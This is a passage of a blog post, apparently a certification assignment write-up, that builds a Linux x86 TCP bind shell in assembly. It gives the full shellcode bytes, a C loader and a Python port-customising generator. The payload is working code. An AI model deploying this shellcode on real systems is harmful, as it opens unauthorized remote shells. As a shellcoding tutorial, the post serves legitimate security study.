src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419222603.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We determine the syscall number of <strong>execve()<\/strong> is <strong>11<\/strong>, which in hex is <strong>0xb<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>execve()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">pathname<\/h4>\n\n\n\n<p>The pathname argument is used to refer to the null-terminated file path of the program executed by <strong>execve()<\/strong>.<\/p>\n\n\n\n<p>This value is pushed to the stack in little-endian format. We will point this value to the filepath of \/bin\/sh.<\/p>\n\n\n\n<p>To maintain stack alignment, we will push the string ''\/\/bin\/sh' which has a length of 8. In doing so, we can cleanly push this value to the stack in two instructions.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">argv<\/h4>\n\n\n\n<p>The argv argument is an array of pointers to strings to be passed to the new program as command-line arguments.<\/p>\n\n\n\n<p>In this case, as we are just looking to implement a call to \/bin\/sh, we will leave this as NULL.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">envp<\/h4>\n\n\n\n<p>The envp argument is an array of pointers to strings to be passed as the environment of the new program.<\/p>\n\n\n\n<p>Once again, as we are just looking to implement a call to \/bin\/sh, we can leave this as NULL.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>execve()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>execve<\/td><td>call<\/td><td>Syscall number<\/td><td>-<\/td><\/tr><tr><td>execve<\/td><td>pathname<\/td><td>Filepath of the program to execute<\/td><td>\"\/bin\/sh\"<\/td><\/tr><tr><td>execve<\/td><td>argv<\/td><td>Command-line arguments of the program<\/td><td>NULL<\/td><\/tr><tr><td>execve<\/td><td>envp<\/td><td>Environment of the new program<\/td><td>NULL<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling execve()<\/h3>\n\n\n\n<p>In case of our system call to <strong>execve()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (11)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - pathname (\"\/\/bin\/sh\" in reverse)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - argv (set to NULL)<\/li>\n\n\n\n<li><strong>EDX<\/strong> - envp (set to NULL)<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Reversing the pathname<\/h3>\n\n\n\n<p>In order to abide by the little-endian format, we must push values in reverse order to the stack.<\/p>\n\n\n\n<p>We can reverse the <strong>pathname<\/strong> and put it in little endian format using the below python code snippet.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/python\n\nimport sys\n\ninput = sys.argv&#x5B;1]\n\nprint 'String length : ' +str(len(input))\n\nstringList = &#x5B;input&#x5B;i:i+4] for i in range(0, len(input), 4)]\n\nfor item in stringList&#x5B;::-1] :\n    print item&#x5B;::-1] + ' : ' + str(item&#x5B;::-1].encode('hex'))\n\n<\/pre><\/div>\n\n\n<p>We can use this script to reverse the string \"\/\/bin\/sh\" and encode it in hex, so that we may include it in our assembly.<\/p>\n\n\n\n<p><strong>Note:<\/strong> as mentioned previously, we have prepended the <strong>pathname<\/strong> with an additional forward slash \"\/\" to make the string length as 8. This allows us to push the string evenly and maintain stack alignment.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\npython2 reverse.py &quot;\/\/bin\/sh&quot;\nString length : 8\nhs\/n : 68732f6e\nib\/\/ : 69622f2f\n<\/pre><\/div>\n\n\n<p>The output of the program gives us the two values we need to push to the stack, <strong>0x68732f6e<\/strong> and <strong>0x69622f2f<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419224332.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>execve()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_execve:\n\n        ; Clear EAX register and set al to syscall number 11 in hex.\n        mov al, 0xb\n\n        ; Push pathname string to the stack and set the EBX register to it\n        xor ebx, ebx\n        push ebx;                       NULL terminate the string\n        push 0x68732f6e;                hs\/n - 0x68732f6e\n        push 0x69622f2f;                ib\/\/ - 0x69622f2f\n        mov ebx, esp;\n\n        ; Clear the ECX and EDX registers for argv and envp\n        xor ecx, ecx\n        xor edx, edx\n\n        ; Execute execve() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>execve()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420231919.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>Note:<\/strong> We once again have to initiate a client connection in order to resume execution after the call to <strong>accept()<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232120.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The syscall is set up for the call to <strong>execve()<\/strong>, having moved <strong>0xb<\/strong> to the <strong>bl<\/strong> register:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232259.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The null-terminated string value of <strong>'\/\/bin\/sh'<\/strong> is pushed to the stack in preparation for the call to <strong>execve()<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232412.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ESP<\/strong> value is moved to the <strong>EBX<\/strong> register, so that <strong>EBX<\/strong> is pointing to the null-terminated string used for the <strong>pathname<\/strong> argument:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232541.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ECX<\/strong> and <strong>EDX<\/strong> registers are both cleared, as they are provided as the NULL <strong>argv<\/strong> and <strong>env<\/strong> arguments:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232727.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Finally, the syscall to <strong>execve()<\/strong> is made, and a call is made to the \/bin\/sh program:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232830.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We connect on the client side, and obtain a fully functioning bind shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420232935.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Complete assembly code<\/h3>\n\n\n\n<p>The final assembly implementation of our TCP bind shell is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; bind_tcp_shell.nasm \n; Author: Jack McBride (PA-6483)\n; Blog: https:\/\/jacklgmcbride.co.uk\/blog\n; \n; Purpose: SLAE32 exam assignment\n;\n; Assignment 1: x86 TCP Bind Shell\n\nglobal _start\n\nsection .text\n\n_start:\n                        ; Linux x86 bind tcp shell\n                        ; set up socket\n                        ; set up bind\n                        ; set up listen\n                        ; set up accept\n\n_socket:\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        xor eax, eax\n        mov al, 0x66 \n\n        ; Clear EBX register and set bl to 0x1 for socket.\n        xor ebx, ebx\n        mov bl, 0x1\n\n        ; Clear ECX register and push values for protocol, type and domain to the stack\n        xor ecx, ecx\n        push ecx;       protocol - 0 (0x00000000)\n        push 0x1;       type - 1 (0x1)\n        push 0x2;       domain - PF_INET (0x2)\n\n        ; set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute socket() syscall\n        int 0x80\n\n_bind:\n\n        ; Clear and set EDX to socket file descriptor returned by socket()\n        xor edx, edx\n        mov edx, eax\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        xor eax, eax\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x2 for bind()\n        mov bl, 0x2\n\n        ; Push sockaddr arguments for call to bind()\n        xor ecx, ecx\n        push ecx;               sin_addr - INADDR_ANY (0x00000000)\n        push word 0x5c11;       sin_port - 4444 (0x5c11)\n        push word 0x2;          sin_family - AF_INET (2)\n\n        ; Save pointer to sockaddr to ESI register \n        mov esi, esp\n\n        push 0x10;              addrlen - 16 (0x10)\n        push esi;               addr\n        push edx;               sockfd\n\n        ; Set ECX to the top of the stack to point to args\n        mov ecx, esp;\n\n        ; Execute bind() syscall\n        int 0x80\n\n_listen:\n\n        ; Clear EAX regster and set al to syscall number 102 in hex.\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x4 for listen()\n        mov bl, 0x4\n\n        ; Push arguments to stack for call to listen()\n        push byte 0x2\n        push edx\n\n        ; set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute listen() syscall\n        int 0x80\n\n_accept:\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x5 for accept()\n        mov bl, 0x5\n\n        ; Clear ECX and push arguments for call to accept()\n        xor ecx, ecx\n        push ecx;               addrlen - NULL\n        push ecx;               addr - NULL\n        push edx;               sockfd - stored in EDX\n\n        ; Set ECX to stack for call to accept()\n        mov ecx, esp\n\n        ; Execute accept() syscall\n        int 0x80\n\n_dup2:\n\n        ; Push the EAX register containing the socket file descriptor returned from accept()\n        push eax\n\n        ; Clear EAX register and set al to syscall number 63 in hex.\n        mov al, 0x3f\n        pop ebx;                  POP socket file descriptor into EBX for dup2 syscall\n        xor ecx, ecx;           Clear ECX register for initial redirection of STDIN (0)\n        int 0x80;                  Execute dup2() syscall\n\n        ; Set dup2() syscall for STDOUT\n        mov al, 0x3f\n        mov cl, 0x1\n        int 0x80\n\n        ; Set dup2() syscall for STDERR\n        mov al, 0x3f\n        mov cl, 0x2\n        int 0x80\n\n_execve:\n\n        ; Clear EAX register and set al to syscall number 11 in hex.\n        mov al, 0xb\n\n        ; Push pathname string to the stack and set the EBX register to it\n        xor ebx, ebx\n        push ebx;                           NULL terminate the string\n        push 0x68732f6e;               hs\/n - 0x68732f6e\n        push 0x69622f2f;                ib\/\/ - 0x69622f2f\n        mov ebx, esp;\n\n        ; Clear the ECX and EDX registers for argv and envp\n        xor ecx, ecx\n        xor edx, edx\n\n        ; Execute execve() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly and linkage<\/h3>\n\n\n\n<p>We can assemble and link our TCP bind shell program as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# nasm -f elf32 -o tcp_bind_shell.o tcp_bind_shell.nasm \n\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# ld -o tcp_bind_shell tcp_bind_shell.o\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420233348.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Executing the shellcode<\/h3>\n\n\n\n<p>Next, we can extract the raw shellcode from our tcp_bind_shell binary and insert it into our C shellcode loader.<\/p>\n\n\n\n<p>Our shellcode loader is a simple C program designed to print the length of our shellcode, and direct execution to it:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \n&quot;SHELLCODE&quot;;\n\nint main()\n{\n        printf(&quot;Shellcode Length: %dn&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>To obtain the raw shellcode bytes of our TCP bind shell, we use an excellent <strong>objdump<\/strong> one liner from <a href=\"https:\/\/www.commandlinefu.com\/commands\/view\/6051\/get-all-shellcode-on-binary-file-from-objdump\">CommandlineFu<\/a>.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\nobjdump -d .\/tcp_bind_shell|grep '&#x5B;0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\x\/g'|paste -d '' -s |sed 's\/^\/&quot;\/'|sed 's\/$\/&quot;\/g'\n&quot;\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80&quot;\n<\/pre><\/div>\n\n\n<p>We embed our shellcode into the <strong>code<\/strong> variable of our C program:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \n&quot;\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80&quot;;\n\nint main()\n{\n        printf(&quot;Shellcode Length: %dn&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>Finally, we compile the our C program using gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420233755.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Finally, we can test the shellcode, confirming that we are able to connect to the bind shell on TCP port 4444.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420233909.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Modifying the port<\/h3>\n\n\n\n<p>In most cases, the user wants to be able to choose which port they want the bind shell to be listening on.<\/p>\n\n\n\n<p>To compensate for this, below is a Python wrapper script which takes a 'port' argument and modifies the tcp_bind_shell.nasm file to assemble the shellcode with this new value. The script then outputs the shellcode to the console and performs cleanup of the created artifacts.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nimport argparse\nimport sys\nimport os\n\ndef convert_to_hex(port):\n\n        # Get hex value of port number\n        val = hex(port)&#x5B;2::]\n\n        # If the length is not divisible by two e.g. if a three-digit\n        # port such as 443 (0x1bb) is chosen, pad with an additional 0.\n        if not len(val) % 2 == 0:\n                val = &quot;0&quot; + val\n\n        # Convert port to little endian format\n        b = bytearray.fromhex(val)&#x5B;::-1]\n        port_le = ''.join(format(x, '02x') for x in b)\n\n        return &quot;0x&quot; + port_le\n\ndef set_port(port):\n        port = convert_to_hex(port)\n        asm = open(&quot;tcp_bind_shell_x86.nasm&quot;, 'rt')\n        data = asm.read()\n        data = data.replace('PORT', port)\n        asm.close()\n        asm = open('tmp.nasm', 'wt')\n        asm.write(data)\n        asm.close()\n\ndef gen_shellcode():\n        stream = os.popen(&quot;&quot;&quot;objdump -d tcp_bind_shell|grep '&#x5B;0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\\\\\x\/g'|paste -d '' -s |sed 's\/^\/&quot;\/'|sed 's\/$\/&quot;\/g'&quot;&quot;&quot;)\n        shellcode = stream.read().rstrip()\n        return shellcode\n\ndef print_shellcode(shellcode, port):\n        print(&quot;&#x5B;*] Generating shellcode for TCP bind shell on port %s&quot; % port)\n        print(&quot;&#x5B;*] Shellcode length: %d bytes&quot; % (len(shellcode.replace(&quot;\\\\x&quot;, &quot;&quot;)) \/2))\n        print(&quot;&#x5B;*] Checking for NULL bytes...\\n%s&quot; % (&quot;&#x5B;-] NULL bytes found.&quot; if &quot;00&quot; in shellcode else &quot;&#x5B;+] No NULL bytes detected!&quot;))\n        print(shellcode)\n\ndef main():\n\n        parser = argparse.ArgumentParser(description='Generate x86 TCP bind shell shellcode.')\n        parser.add_argument('-p', '--port', type=int, help='Local port for TCP bind shell to listen on.')\n\n        args = parser.parse_args()\n        if len(sys.argv) == 1:\n                parser.print_help()\n                sys.exit()\n\n        # Modify the port in tcp_bind_shell.nasm\n        set_port(args.port)\n\n        # Link and assemble code\n        os.system('nasm -f elf32 -o tcp_bind_shell_x86.o tmp.nasm')\n        os.system('ld -o tcp_bind_shell_x86 tcp_bind_shell_x86.o')\n\n        # Dump the shellcode using objdump\n        shellcode = gen_shellcode()\n\n        # Print shellcode\n        print_shellcode(shellcode, args.port)\n\n        # Cleanup\n        os.system('rm tmp.nasm')\n        os.system('rm tcp_bind_shell_x86.o')\n        os.system('rm tcp_bind_shell_x86')\n\nif __name__ == &quot;__main__&quot;:\n        main()\n<\/pre><\/div>\n\n\n<p>We generate our shellcode for a bind shell on TCP port 443:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220421122435.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# python3 wrapper.py -p 443                                                                                                                                                                      130 \u2a2f 1 \u2699\n&#x5B;*] Generating shellcode for TCP bind shell on port 443\n&#x5B;*] Shellcode length: 117 bytes\n&#x5B;*] Checking for NULL bytes...\n&#x5B;+] No NULL bytes detected!\n&quot;\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x01\\xbb\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80&quot;\n<\/pre><\/div>\n\n\n<p>We can now paste the generated shellcode into our shellcode.c program:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220421122521.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \n&quot;\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x01\\xbb\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80&quot;;\n\nint main()\n{\n        printf(&quot;Shellcode Length: %dn&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>We compile the shellcode with gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<p>We connect over netcat and confirm that our TCP bind shell is listening on our specified port, 443. Success!<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220421122638-e1650551330573.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<p>The assembly, python and C source code for the above Linux x86 TCP bind shell implementation can be found on my <a href=\"https:\/\/github.com\/war4uthor\/SLAE32\">GitHub repository<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SecurityTube Linux Assembly Expert<\/a> certification.<\/p>\n\n\n\n<p><strong>Student ID:<\/strong> PA-6483<\/p>\n\n\n\n<p>All code was written and tested using 32-bit Kali Linux:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(jack\u327fkali)-&#x5B;~\/SLAE32\/Assignment 1: TCP Bind Shell]\n\u2514\u2500$ uname -a\nLinux kali 5.5.0-kali2-686-pae #1 SMP Debian 5.5.17-1kali1 (2020-04-21) i686 GNU\/Linux\n<\/pre><\/div>\n\n\n<p>In the next blog post, we will be covering how to implement an x86 TCP reverse shell in assembly.<\/p>\n\n\n\n<p>Thanks for reading!<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n","protected":false},"excerpt":{"rendered":"<p>In this blog post, we will be covering the process behind writing and analysing an x86 TCP bind shell for Linux in assembly. This post will be the first in a series of posts created for the SLAE32 certification course provided by Pentester Academy. Overview The code for the TCP bind shell will consist of&hellip;<\/p>\n","protected":false},"author":1,"featured_media":305,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29,6,30,26,28],"tags":[27],"class_list":["post-274","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-assembly","category-certifications","category-linux","category-reverse-engineering","category-shellcoding","tag-slae32"],"_links":{"self":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=274"}],"version-history":[{"count":19,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/274\/revisions"}],"predecessor-version":[{"id":760,"href":"https:\/\/jacklgmcbride.co.